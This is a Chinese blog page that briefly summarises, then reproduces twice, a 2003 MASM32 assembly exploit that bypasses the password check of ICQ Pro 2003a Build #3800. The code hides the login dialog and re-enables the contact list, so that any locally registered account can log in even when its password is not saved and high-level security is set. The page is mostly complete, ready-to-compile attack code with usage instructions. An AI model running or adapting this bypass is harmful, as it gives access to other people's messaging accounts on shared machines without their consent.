这篇博客详细介绍了如何利用ICQ Pro 2003a Build #3800的一个密码绕过漏洞。作者Caua Moura Prado展示了如何通过运行特定的asm代码,在本地注册的任何账户上登录ICQ服务器,无论是否保存了密码,甚至可以绕过高级安全设置。博客还指出,ICQ Lite alpha Build 1211、ICQ 2001b和ICQ 2002a不受此漏洞影响。内容包括使用MASM32编译器编写的ASM代码,用于启用登录窗口并隐藏登录屏幕。
; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
; CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE BOF
; -------------------------------------------------------------------------
;
; 07/02/2003 - ca1-icq.asm
; ICQ Password Bypass exploit.
; written by Caua Moura Prado (aka ca1)
;
; This exploit allows you to login to ICQ server using any account registered *locally*
; no matter the 'save password' option is checked or not. High level security is also bypassed.
; All you have to do is run the exploit and set status property using your mouse when the flower
; is yellow. If you accidentally set status to offline then you will need to restart ICQ and run
; the exploit again.
;
; uh-oh!
; ___
; __/ /__
; / /___/ / Vulnerable:
; /__/+ +/__/ ICQ Pro 2003a Build #3800
; / ~~~ /
; /__/ /__/ Not Vulnerable:
; /___/ ICQ Lite alpha Build 1211
; ICQ 2001b and ICQ 2002a
; tHe Flaw Power All other versions were not tested.
;
coded with masm32
; ________________________________________________________________exploit born in .br
.386
.model flat, stdcall
option casemap:none
include /masm32/include/user32.inc
include /masm32/include/kernel32.inc
includelib /masm32/lib/user32.lib
includelib /masm32/lib/kernel32.lib
.data
szTextHigh byte 'Password Verification', 0
szTextLow byte 'Login to server', 0
szClassName byte '#32770', 0
.data?
hWndLogin dword ?
.code
_entrypoint:
invoke FindWindow, addr szClassName, addr szTextHigh
mov hWndLogin, eax
.if hWndLogin == 0
invoke FindWindow, addr szClassName, addr szTextLow
mov hWndLogin, eax
.endif
invoke GetParent, hWndLogin
invoke EnableWindow, eax, 1 ;Enable ICQ contact
list
invoke ShowWindow, hWndLogin, 0 ;get rid of Login
screen (don't kill this window)
invoke ExitProcess, 0 ;uhuu.. cya! i gotta
sleep!
end _entrypoint
; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
; CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE EOF
; -------------------------------------------------------------------------
; CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE BOF
; -------------------------------------------------------------------------
;
; 07/02/2003 - ca1-icq.asm
; ICQ Password Bypass exploit.
; written by Caua Moura Prado (aka ca1)
;
; This exploit allows you to login to ICQ server using any account registered *locally*
; no matter the 'save password' option is checked or not. High level security is also bypassed.
; All you have to do is run the exploit and set status property using your mouse when the flower
; is yellow. If you accidentally set status to offline then you will need to restart ICQ and run
; the exploit again.
;
; uh-oh!
; ___
; __/ /__
; / /___/ / Vulnerable:
; /__/+ +/__/ ICQ Pro 2003a Build #3800
; / ~~~ /
; /__/ /__/ Not Vulnerable:
; /___/ ICQ Lite alpha Build 1211
; ICQ 2001b and ICQ 2002a
; tHe Flaw Power All other versions were not tested.
;
coded with masm32
; ________________________________________________________________exploit born in .br
.386
.model flat, stdcall
option casemap:none
include /masm32/include/user32.inc
include /masm32/include/kernel32.inc
includelib /masm32/lib/user32.lib
includelib /masm32/lib/kernel32.lib
.data
szTextHigh byte 'Password Verification', 0
szTextLow byte 'Login to server', 0
szClassName byte '#32770', 0
.data?
hWndLogin dword ?
.code
_entrypoint:
invoke FindWindow, addr szClassName, addr szTextHigh
mov hWndLogin, eax
.if hWndLogin == 0
invoke FindWindow, addr szClassName, addr szTextLow
mov hWndLogin, eax
.endif
invoke GetParent, hWndLogin
invoke EnableWindow, eax, 1 ;Enable ICQ contact
list
invoke ShowWindow, hWndLogin, 0 ;get rid of Login
screen (don't kill this window)
invoke ExitProcess, 0 ;uhuu.. cya! i gotta
sleep!
end _entrypoint
; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
; CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE EOF
; -------------------------------------------------------------------------
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
